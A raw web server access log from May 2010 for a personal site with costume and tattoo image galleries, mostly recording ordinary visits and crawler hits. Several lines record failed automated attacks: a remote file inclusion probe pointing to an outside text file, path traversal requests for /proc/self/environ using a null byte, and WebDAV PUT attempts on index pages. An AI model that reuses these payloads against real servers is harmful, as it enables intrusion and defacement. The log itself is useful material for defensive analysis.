89.185.231.103 - - [02/May/2010:19:07:49 -0500] "GET /logs//board//include/mail.inc.php?skin_board_path=http://www.sefaz.mt.gov.br/portal/tes.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
89.185.231.103 - - [02/May/2010:19:07:49 -0500] "GET /logs/access_log.1266364800//board//include/mail.inc.php?skin_board_path=http://www.sefaz.mt.gov.br/portal/tes.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
89.185.231.103 - - [02/May/2010:19:07:49 -0500] "GET //board//include/mail.inc.php?skin_board_path=http://www.sefaz.mt.gov.br/portal/tes.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
87.250.255.243 - - [02/May/2010:19:09:31 -0500] "GET /logs/access_log.1214956800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
68.57.157.118 - - [02/May/2010:19:09:54 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/wiki/Costume_design""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2)"
68.57.157.118 - - [02/May/2010:19:09:55 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2)"
68.57.157.118 - - [02/May/2010:19:09:59 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "http://tomdolan.pconline.com/costume/""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2)"
68.57.157.118 - - [02/May/2010:19:10:00 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2)"
68.57.157.118 - - [02/May/2010:19:10:00 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2)"
68.57.157.118 - - [02/May/2010:19:10:00 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2)"
68.57.157.118 - - [02/May/2010:19:10:00 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2)"
208.115.111.248 - - [02/May/2010:19:14:36 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
85.114.135.218 - - [02/May/2010:19:18:44 -0500] "GET /logs/API_HOME_DIR=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 364 "-""libwww-perl/5.813"
85.114.135.218 - - [02/May/2010:19:18:44 -0500] "GET /API_HOME_DIR=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 359 "-""libwww-perl/5.813"
113.52.152.6 - - [02/May/2010:19:19:51 -0500] "GET /logs/API_HOME_DIR=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 364 "-""libwww-perl/5.805"
113.52.152.6 - - [02/May/2010:19:19:52 -0500] "GET /API_HOME_DIR=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 359 "-""libwww-perl/5.805"
113.52.152.6 - - [02/May/2010:19:19:54 -0500] "GET /logs/API_HOME_DIR=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 364 "-""libwww-perl/5.805"
113.52.152.6 - - [02/May/2010:19:19:55 -0500] "GET /API_HOME_DIR=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 359 "-""libwww-perl/5.805"
87.250.255.243 - - [02/May/2010:19:28:37 -0500] "GET /logs/access_log.1240185600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
85.17.73.48 - - [02/May/2010:19:28:55 -0500] "PUT /index.htm HTTP/1.1" 405 316 "-""Microsoft Data Access Internet Publishing Provider DAV 1.1"
85.17.73.48 - - [02/May/2010:19:28:55 -0500] "PUT /index.html HTTP/1.1" 405 317 "-""Microsoft Data Access Internet Publishing Provider DAV 1.1"
85.17.73.48 - - [02/May/2010:19:28:55 -0500] "PUT /welcome.htm HTTP/1.1" 405 318 "-""Microsoft Data Access Internet Publishing Provider DAV 1.1"
85.17.73.48 - - [02/May/2010:19:28:55 -0500] "PUT /welcome.html HTTP/1.1" 405 319 "-""Microsoft Data Access Internet Publishing Provider DAV 1.1"
85.17.73.48 - - [02/May/2010:19:28:55 -0500] "PUT /home.htm HTTP/1.1" 405 315 "-""Microsoft Data Access Internet Publishing Provider DAV 1.1"
85.17.73.48 - - [02/May/2010:19:28:55 -0500] "PUT /home.html HTTP/1.1" 405 316 "-""Microsoft Data Access Internet Publishing Provider DAV 1.1"
85.17.73.48 - - [02/May/2010:19:28:56 -0500] "PUT /index.aspx HTTP/1.1" 405 317 "-""Microsoft Data Access Internet Publishing Provider DAV 1.1"
85.17.73.48 - - [02/May/2010:19:28:56 -0500] "PUT /defaut.aspx HTTP/1.1" 405 318 "-""Microsoft Data Access Internet Publishing Provider DAV 1.1"
85.17.73.48 - - [02/May/2010:19:28:56 -0500] "PUT /home.aspx HTTP/1.1" 405 316 "-""Microsoft Data Access Internet Publishing Provider DAV 1.1"
85.17.73.48 - - [02/May/2010:19:28:56 -0500] "PUT /default.htm HTTP/1.1" 405 318 "-""Microsoft Data Access Internet Publishing Provider DAV 1.1"
85.17.73.48 - - [02/May/2010:19:28:56 -0500] "PUT /default.html HTTP/1.1" 405 319 "-""Microsoft Data Access Internet Publishing Provider DAV 1.1"
85.17.73.48 - - [02/May/2010:19:28:56 -0500] "PUT /index.asp HTTP/1.1" 405 316 "-""Microsoft Data Access Internet Publishing Provider DAV 1.1"
85.17.73.48 - - [02/May/2010:19:28:56 -0500] "PUT /main.htm HTTP/1.1" 405 315 "-""Microsoft Data Access Internet Publishing Provider DAV 1.1"
85.17.73.48 - - [02/May/2010:19:28:56 -0500] "PUT /iisstart.asp HTTP/1.1" 405 319 "-""Microsoft Data Access Internet Publishing Provider DAV 1.1"
85.17.73.48 - - [02/May/2010:19:28:57 -0500] "PUT /main.html HTTP/1.1" 405 316 "-""Microsoft Data Access Internet Publishing Provider DAV 1.1"
85.17.73.48 - - [02/May/2010:19:28:57 -0500] "PUT /main.asp HTTP/1.1" 405 315 "-""Microsoft Data Access Internet Publishing Provider DAV 1.1"
85.17.73.48 - - [02/May/2010:19:28:57 -0500] "PUT /main.aspx HTTP/1.1" 405 316 "-""Microsoft Data Access Internet Publishing Provider DAV 1.1"
85.17.73.48 - - [02/May/2010:19:28:57 -0500] "PUT /default.asp HTTP/1.1" 405 318 "-""Microsoft Data Access Internet Publishing Provider DAV 1.1"
85.17.73.48 - - [02/May/2010:19:28:57 -0500] "PUT /home.asp HTTP/1.1" 405 315 "-""Microsoft Data Access Internet Publishing Provider DAV 1.1"
85.17.73.48 - - [02/May/2010:19:28:57 -0500] "PUT /index.php HTTP/1.1" 405 316 "-""Microsoft Data Access Internet Publishing Provider DAV 1.1"
85.17.73.48 - - [02/May/2010:19:28:57 -0500] "PUT /default.php HTTP/1.1" 405 318 "-""Microsoft Data Access Internet Publishing Provider DAV 1.1"
85.17.73.48 - - [02/May/2010:19:28:57 -0500] "PUT /home.php HTTP/1.1" 405 315 "-""Microsoft Data Access Internet Publishing Provider DAV 1.1"
85.17.73.48 - - [02/May/2010:19:28:57 -0500] "PUT /iisstart.asp HTTP/1.1" 405 319 "-""Microsoft Data Access Internet Publishing Provider DAV 1.1"
85.17.73.48 - - [02/May/2010:19:28:58 -0500] "PUT /localstart.asp HTTP/1.1" 405 321 "-""Microsoft Data Access Internet Publishing Provider DAV 1.1"
85.17.73.48 - - [02/May/2010:19:28:58 -0500] "PUT /Entrada.asp HTTP/1.1" 405 318 "-""Microsoft Data Access Internet Publishing Provider DAV 1.1"
85.17.73.48 - - [02/May/2010:19:28:58 -0500] "GET / HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
67.195.112.180 - - [02/May/2010:19:29:08 -0500] "GET /logs/access_log.1188259200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.218.116.131 - - [02/May/2010:19:36:21 -0500] "GET /logs/access_log.1246320000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
98.14.118.65 - - [02/May/2010:19:37:36 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.com/search?client=safari&rls=en&q=gus+ert+grimm+tattoo+flash&ie=UTF-8&oe=UTF-8""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
98.14.118.65 - - [02/May/2010:19:37:36 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
98.14.118.65 - - [02/May/2010:19:37:37 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
98.14.118.65 - - [02/May/2010:19:37:39 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
98.14.118.65 - - [02/May/2010:19:37:39 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
98.14.118.65 - - [02/May/2010:19:37:39 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
98.14.118.65 - - [02/May/2010:19:37:39 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
98.14.118.65 - - [02/May/2010:19:37:39 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
98.14.118.65 - - [02/May/2010:19:37:39 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
98.14.118.65 - - [02/May/2010:19:37:39 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
98.14.118.65 - - [02/May/2010:19:37:39 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
98.14.118.65 - - [02/May/2010:19:37:39 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
98.14.118.65 - - [02/May/2010:19:37:39 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
98.14.118.65 - - [02/May/2010:19:37:39 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
98.14.118.65 - - [02/May/2010:19:37:49 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
98.14.118.65 - - [02/May/2010:19:37:49 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
98.14.118.65 - - [02/May/2010:19:37:49 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
98.14.118.65 - - [02/May/2010:19:37:49 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
98.14.118.65 - - [02/May/2010:19:37:49 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
98.14.118.65 - - [02/May/2010:19:37:49 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
98.14.118.65 - - [02/May/2010:19:37:49 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
98.14.118.65 - - [02/May/2010:19:37:49 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
98.14.118.65 - - [02/May/2010:19:37:49 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
98.14.118.65 - - [02/May/2010:19:37:49 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
98.14.118.65 - - [02/May/2010:19:37:49 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
98.14.118.65 - - [02/May/2010:19:37:57 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
98.14.118.65 - - [02/May/2010:19:37:57 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
98.14.118.65 - - [02/May/2010:19:37:57 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
98.14.118.65 - - [02/May/2010:19:37:57 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
98.14.118.65 - - [02/May/2010:19:37:57 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
98.14.118.65 - - [02/May/2010:19:37:57 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
98.14.118.65 - - [02/May/2010:19:37:57 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
98.14.118.65 - - [02/May/2010:19:37:57 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
98.14.118.65 - - [02/May/2010:19:37:57 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
98.14.118.65 - - [02/May/2010:19:37:57 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
98.14.118.65 - - [02/May/2010:19:37:57 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
98.14.118.65 - - [02/May/2010:19:38:12 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
98.14.118.65 - - [02/May/2010:19:38:12 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
98.14.118.65 - - [02/May/2010:19:38:12 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
98.14.118.65 - - [02/May/2010:19:38:12 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
98.14.118.65 - - [02/May/2010:19:38:12 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
98.14.118.65 - - [02/May/2010:19:38:12 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
98.14.118.65 - - [02/May/2010:19:38:12 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
98.14.118.65 - - [02/May/2010:19:38:12 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
98.14.118.65 - - [02/May/2010:19:38:12 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
98.14.118.65 - - [02/May/2010:19:38:12 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
98.14.118.65 - - [02/May/2010:19:38:12 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
98.14.118.65 - - [02/May/2010:19:38:22 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
98.14.118.65 - - [02/May/2010:19:38:22 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
98.14.118.65 - - [02/May/2010:19:38:22 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
98.14.118.65 - - [02/May/2010:19:38:22 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
67.218.116.164 - - [02/May/2010:19:44:48 -0500] "GET /logs/access_log.1221350400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
216.129.119.44 - - [02/May/2010:19:48:32 -0500] "GET /logs/access_log.1249257600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
208.115.111.248 - - [02/May/2010:19:48:49 -0500] "GET /logs/access_log.1217808000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [02/May/2010:19:48:51 -0500] "GET /logs/access_log.1224201600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [02/May/2010:19:48:54 -0500] "GET /logs/access_log.1240358400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
207.46.199.42 - - [02/May/2010:19:49:26 -0500] "GET /logs/access_log.1256083200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
208.80.193.28 - - [02/May/2010:19:50:45 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SIMBAR Enabled; InfoPath.1; .NET CLR 1.1.4322)"
216.129.119.12 - - [02/May/2010:19:51:16 -0500] "GET /logs/access_log.1210550400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
207.46.204.243 - - [02/May/2010:19:51:56 -0500] "GET /logs/access_log.1226448000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.129.119.10 - - [02/May/2010:19:54:12 -0500] "GET /logs/access_log.1241913600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
87.250.255.243 - - [02/May/2010:19:55:31 -0500] "GET /costume/thmb4.htm HTTP/1.1" 200 3851 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [02/May/2010:20:08:57 -0500] "GET /logs/access_log.1243468800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.48 - - [02/May/2010:20:15:24 -0500] "GET /logs/access_log.1193875200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
79.174.78.178 - - [02/May/2010:20:19:11 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
